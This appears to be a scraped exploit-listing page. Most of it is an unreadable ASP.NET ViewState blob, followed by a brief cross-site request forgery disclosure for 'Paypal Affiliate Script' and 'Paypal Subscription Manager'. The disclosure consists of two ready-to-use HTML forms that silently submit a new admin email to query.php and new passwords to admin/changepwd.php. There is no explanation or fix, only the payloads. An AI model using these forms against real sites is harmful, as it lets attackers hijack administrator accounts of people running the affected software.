3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10EAAAACQUAAAAHAAAACQYAAAAEBQAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwYAAAAAAQAAAAQAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2bf%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAQYIAAAAEUNvbnRhaW5lckNTU0NsYXNzBgkAAAAHcG9zdC1zYgH2%2f%2f%2f%2f%2bf%2f%2f%2fwYLAAAAFk51bWJlck9mSXRlbXNUb0Rpc3BsYXkGDAAAAAE0AfP%2f%2f%2f%2f5%2f%2f%2f%2fBg4AAAAFVGl0bGUGDwAAAAAB8P%2f%2f%2f%2fn%2f%2f%2f8GEQAAAApMYW5ndWFnZUlEBhIAAAAAC2RkAgUPDxYCHixjdGwwMCRjdGwwMCRjcGhCYXNlJGNwaEJhc2UkY3BoU2lkZUJhciRjdGwwNDLRDwABAAAA%2f%2f%2f%2f%2fwEAAAAAAAAADAIAAABSQXBwX1N1YkNvZGVfQ1NDb2RlLmpkZmQtbGpvLCBWZXJzaW9uPTAuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49bnVsbAUBAAAAJlNlcnZlclNpZGUuU2lkZWJhckluaXRpYWxpemF0aW9uVmFsdWVzAwAAABw8Q29udHJvbFBhdGg%2ba19fQmFja2luZ0ZpZWxkJDxBc3NvY2lhdGVkQ29udGVudElEPmtfX0JhY2tpbmdGaWVsZBs8UHJvcGVydGllcz5rX19CYWNraW5nRmllbGQBAAMJ4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAAYDAAAAIH4vQ29udHJvbHMvU1NCbG9nQ2F0ZWdvcmllcy5hc2N4AAAAAAAAAAAJBAAAAAQEAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQQAAAAJBQAAAAcAAAAJBgAAAAQFAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHBgAAAAABAAAABAAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT5%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQEBBggAAAARQ29udGFpbmVyQ1NTQ2xhc3MGCQAAAAdwb3N0LXNiAfb%2f%2f%2f%2f5%2f%2f%2f%2fBgsAAAAFVGl0bGUGDAAAAAAB8%2f%2f%2f%2f%2fn%2f%2f%2f8GDgAAABJUb3BMZXZlbFRheG9ub215SUQGDwAAAAAB8P%2f%2f%2f%2fn%2f%2f%2f8GEQAAAApMYW5ndWFnZUlEBhIAAAAAC2RkGAUFOGN0bDAwJGN0bDAwJGNwaEJhc2UkY3BoQmFzZSRjcGhCbG9nQ29udGVudCRsdkRlZmF1bHRWaWV3DzwrAA4CDGYNAgZkBTljdGwwMCRjdGwwMCRjcGhCYXNlJGNwaEJhc2UkY3BoQmxvZ0NvbnRlbnQkbHZUYXhvbm9teVZpZXcPFCsADmRkZGRkZGQUKwABZAIBZGRkZgIEZAU5Y3RsMDAkY3RsMDAkY3BoQmFzZSRjcGhCYXNlJGNwaEJsb2dDb250ZW50JGRwVGF4b25vbXlWaWV3DxQrAARkZAIEAgFkBTFjdGwwMCRjdGwwMCRjcGhCYXNlJGNwaEJhc2UkY3BoQmxvZ0NvbnRlbnQkbXZCbG9nDw9kAgFkBThjdGwwMCRjdGwwMCRjcGhCYXNlJGNwaEJhc2UkY3BoQmxvZ0NvbnRlbnQkZHBEZWZhdWx0Vmlldw8UKwAEZGQCBmZkYq2kQ%2f4l4yf34HV%2b2efEmsvquQ0%3d

                                #######################################

Vulnerabilities CSRF > Paypal Affiliate Script && Paypal Subscription Manager

<form id="form1" name="form1" method="post" action="target.com/[PATH]/library/query.php">
<input type="hidden" value="mail@mail.com" size="40" name="EMAIL"/>
<input type="submit" value="Save" name="Submit"/>

&&

<form action="target.com/[PATH]/admin/changepwd.php" method="post">
<input type="hidden" size="30" style="border: 1px solid rgb(128, 128, 128); padding: 1px 4px; background-color: rgb(236, 234, 230);" name="password"/>
<input type="hidden" size="30" style="border: 1px solid rgb(128, 128, 128); padding: 1px 4px; background-color: rgb(236, 234, 230);" name="password1"/>
<input type="submit" value="Submit" name="submit"/>
</form>

                                #######################################

Comments